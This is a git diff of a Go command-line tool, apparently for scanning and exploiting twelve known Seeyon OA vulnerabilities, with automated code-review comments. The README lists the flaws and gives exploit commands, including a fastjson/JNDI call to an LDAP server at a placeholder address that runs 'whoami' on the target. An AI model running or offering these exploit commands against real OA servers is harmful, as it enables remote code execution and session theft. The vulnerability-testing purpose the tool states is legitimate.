diff --git a/README.md b/README.md
index 8047ffd..4296b94 100644
--- a/README.md
+++ b/README.md
@@ -1,67 +1,68 @@ - # seeyoner + 致远OA漏洞利用工具 -## Usage -``` + +## 使用方式 + +```shell D:\>seeyoner.exe -h - seeyoner v1.0 by x51 -Usage:seeyoner.exe -u http://192.168.1.1:8080/ -vn all -m scan -Options: - -a string - run mode ldap args - -c string - run mode command args - -h print this help info. - -m string - mode:scan/run - -show - show vuln list. - -u string - target url. - -vn string - vuln number,[1,2,...] -``` -### scan -全漏洞探测: -``` -seeyoner.exe -u http://xxx.com -vn all -m scan +一个简单的致远OA安全测试工具,目的是为了协助漏洞自查、修复工作。 + +Usage: + seeyoner.exe [command] + +Available Commands: + exploit 漏洞利用 + help Help about any command + list 列出所有漏洞信息 + scan 漏洞检测 + +Flags: + -h, --help help for main.exe + +Use "seeyoner.exe [command] --help" for more information about a command. ``` -![image](https://user-images.githubusercontent.com/45651912/124346939-31545880-dc14-11eb-8fa2-7dbb69aae836.png) -指定漏洞探测: -`-vn`指定漏洞编号,可通过`-show`参数查看: +### 漏洞信息 +```shell +D:\>seeyoner.exe list +【1】seeyon<8.0_fastjson反序列化 +【2】thirdpartyController.do管理员session泄露 +【3】webmail.do任意文件下载(CNVD-2020-62422) +【4】ajax.do未授权&任意文件上传 +【5】getSessionList泄露Session +【6】htmlofficeservlet任意文件上传 +【7】initDataAssess.jsp信息泄露 +【8】DownExcelBeanServlet信息泄露 +【9】createMysql.jsp数据库信息泄露 +【10】test.jsp路径 +【11】setextno.jsp路径 +【12】status.jsp路径(状态监控页面) ``` -D:\>seeyoner.exe -show -漏洞列表: -1、seeyon<8.0_fastjson反序列化 -2、thirdpartyController.do管理员session泄露 -3、webmail.do任意文件下载(CNVD-2020-62422) -4、ajax.do未授权&任意文件上传 -5、getSessionList泄露Session -6、htmlofficeservlet任意文件上传 -7、initDataAssess.jsp信息泄露 -8、DownExcelBeanServlet信息泄露 -9、createMysql.jsp数据库信息泄露 -10、test.jsp路径 -11、setextno.jsp路径 -12、status.jsp路径(状态监控页面) +### 漏洞检测 + +#### 全漏洞探测 + +```shell +seeyoner.exe scan -u http://xxx.com -i 0 ``` -探测seeyon<8.0_fastjson反序列化漏洞: +#### ![](./images/image-20230802155022124.png) 指定漏洞探测 + + +以探测seeyon<8.0_fastjson反序列化漏洞为例,指定编号为`1`: ``` -seeyoner.exe -u http://xxx.com -vn 1 -m scan +seeyoner.exe scan -u http://xxx.com -i 1 ``` -### run +### 漏洞利用 
以Session泄露+zip文件上传解压为例,指定编号为`2`: +```shell +seeyoner.exe exploit -u http://xxxx.com -i 2 ``` -seeyoner.exe -u http://xxxx.com -vn 2 -m run +seeyon<8.0_fastjson反序列化利用起来比较特殊: +```shell +# seeyoner.exe exploit -u {url}|{ldap}|{cmd} -i 1 +# 示例 +seeyoner.exe exploit -u http://xxxx.com|ldap://x.x.x.x:1389/TomcatBypass/TomcatEcho|whoami -i 1 ``` -![image](https://user-images.githubusercontent.com/45651912/124347038-bb9cbc80-dc14-11eb-8e52-e3292588c350.png) -seeyon<8.0_fastjson反序列化利用起来比较特殊,也只有该漏洞会用到`-a`和`-c`参数: -`-a`指定你的LDAP服务地址,`-c`指定需要执行的系统命令 -``` -seeyoner.exe -u http://xxxx.com -vn 1 -m run -a ldap://x.x.x.x:1389/TomcatBypass/TomcatEcho -c whoami -``` -![image](https://user-images.githubusercontent.com/45651912/124293426-3ae4ae80-db89-11eb-8a68-def2ba248f8d.png) - diff --git a/README1.md b/README1.md deleted file mode 100644 index 8b13789..0000000 --- a/README1.md +++ /dev/null @@ -1 +0,0 @@ - diff --git a/cmd/root.go b/cmd/root.go index 18b831a..28872d6 100644 --- a/cmd/root.go +++ b/cmd/root.go @@ -2,17 +2,23 @@ package cmd import ( "os" + "path/filepath" "github.com/spf13/cobra" ) +var ( + path, _ = os.Executable() + _, exec = filepath.Split(path) +) + var ( url string vulnId int ) var rootCmd = &cobra.Command{ - Use: "Seeyoner", - Short: "Seeyoner", + Use: exec, + Short: exec, Long: `一个简单的致远OA安全测试工具,目的是为了协助漏洞自查、修复工作。`, } diff --git a/cmd/scan.go b/cmd/scan.go index aa5b7c9..db7fe3c 100644 --- a/cmd/scan.go +++ b/cmd/scan.go @@ -1,6 +1,7 @@ package cmd import ( + "fmt" "Seeyoner/core" "github.com/spf13/cobra" ) @@ -12,8 +13,16 @@ var scanCmd = &cobra.Command{ `, Run: func(cmd *cobra.Command, args []string) { factory := new(core.IFactory) - iScan := factory.NewFactory(vulnId) - iScan.Scan(url) + if vulnId == 0 { + for i :=1 ; i < 13; i++ { + fmt.Print("[", i, "] >>> ") + iScan := factory.NewFactory(i) + iScan.Scan(url) + } + } else { + iScan := factory.NewFactory(vulnId) + iScan.Scan(url) + } }, } 
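Review bot: `path, _ = os.Executable()` in the new package-level `var` block discards the error, so when the executable path cannot be resolved `path` is `""`, `exec` is `""`, and `rootCmd.Use`/`Short` end up as an empty string in the help output. A fixed fallback name keeps the usage text sane, and `filepath.Base` says what is meant more directly than discarding half of `filepath.Split`. The names `path` and `exec` also shadow the conventional identifiers of the `path` and `os/exec` packages for anyone who later imports them into this package, so a name such as `binName` avoids that.
```go
// binName is the name the binary was invoked as; it drives rootCmd.Use/Short.
var binName = func() string {
	p, err := os.Executable()
	if err != nil || p == "" {
		return "seeyoner" // fallback when the executable path is unavailable
	}
	return filepath.Base(p)
}()

// … unchanged: url/vulnId var block …

var rootCmd = &cobra.Command{
	Use:   binName,
	Short: binName,
	// … unchanged: Long …
}
```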
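Review bot: The all-vulns loop `for i :=1 ; i < 13; i++` in scan.go hard-codes the upper bound as a magic number that duplicates the 12 entries the `list` command prints, and the non-zero `vulnId` branch does no range check, so an id outside 1–12 goes straight to `factory.NewFactory(vulnId)`; if that returns a nil interface for unknown ids, as the hunk suggests but does not show, `iScan.Scan(url)` panics (NewFactory is outside this diff, so confirm). A package-level constant for the count plus an explicit range check before dispatching fixes both, and the `for` header spacing is not gofmt-clean as written. The `Run` closure and the `scanCmd` literal begin above the hunk.
```go
// vulnCount is the number of checks NewFactory knows about; keep it in sync with `list`.
const vulnCount = 12

// … unchanged: scanCmd header …
	Run: func(cmd *cobra.Command, args []string) {
		factory := new(core.IFactory)
		if vulnId == 0 {
			for i := 1; i <= vulnCount; i++ {
				fmt.Print("[", i, "] >>> ")
				factory.NewFactory(i).Scan(url)
			}
			return
		}
		if vulnId < 1 || vulnId > vulnCount {
			fmt.Printf("[x] invalid vuln id %d, expected 1-%d\n", vulnId, vulnCount)
			return
		}
		factory.NewFactory(vulnId).Scan(url)
	},
```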
diff --git a/images/image-20230802155022124.png b/images/image-20230802155022124.png
new file mode 100644
index 0000000..6303ae7
Binary files /dev/null and b/images/image-20230802155022124.png differ
diff --git a/makefile b/makefile
new file mode 100644
index 0000000..8e7f145
--- /dev/null
+++ b/makefile
@@ -0,0 +1,31 @@
+# Output File Name
+NAME=seeyoner
+# Output File Location
+DIR=output
+$(shell mkdir -p ${DIR})
+
+# Go build flags
+LDFLAGS=-ldflags "-s -w"
+# Go build file
+GOFILE=main.go
+
+default:
+ go build ${LDFLAGS} -o ${DIR}/${NAME} ${GOFILE}
+
+all: windows linux darwin
+
+# Compile Server - Windows x64
+windows:
+ export GOOS=windows;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${NAME}-Windows-x64.exe ${GOFILE}
+
+# Compile Server - Linux x64
+linux:
+ export GOOS=linux;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${NAME}-Linux-x64 ${GOFILE}
+
+# Compile Server - Darwin x64
+darwin:
+ export GOOS=darwin;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${NAME}-Darwin-x64 ${GOFILE}
+
+# clean
+clean:
+ rm -rf ${DIR}
\ No newline at end of file
diff --git a/vulners/sy01.go b/vulners/sy01.go
index f76745e..7b28f52 100644
--- a/vulners/sy01.go
+++ b/vulners/sy01.go
@@ -25,9 +25,14 @@ func (s *Sy01) Scan(targetUrl string) {
 func (*Sy01) Exploit(targetUrl string) {
 s := strings.Split(targetUrl, "|")
+ if len(s) != 3 {
+ color.Red("[x]url参数格式不正确!")
+ return
+ }
+
 url := s[0]
 ldapUrl := s[1]
 command := s[2]
- runResult, err := sy01runcore(targetUrl, ldapUrl, command)
+ runResult, err := sy01runcore(url, ldapUrl, command)
 if err != nil {
 color.Red("[x]漏洞利用异常!")
 return
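Review bot: None of the targets in the new makefile (`default`, `all`, `windows`, `linux`, `darwin`, `clean`) are declared phony, so a file or directory with one of those names in the repo root would make `make` report the target as up to date and silently skip the build or the cleanup; add `.PHONY: default all windows linux darwin clean` near the top. `$(shell mkdir -p ${DIR})` also runs at parse time on every invocation, including `make clean`, which is harmless here but deserves a comment such as `# runs on every make invocation, clean included`.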
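Review bot: The new guard `if len(s) != 3` in Exploit still accepts empty segments, so a `targetUrl` such as `http://x||` passes and `ldapUrl`/`command` are blank when `sy01runcore` is called, which then surfaces only as the generic `[x]漏洞利用异常!` message. Checking each part, `if len(s) != 3 || s[0] == "" || s[1] == "" || s[2] == "" {`, and naming the expected `{url}|{ldap}|{cmd}` layout in the format error would make the rejection actionable for the user. The body of Exploit continues past the end of the hunk.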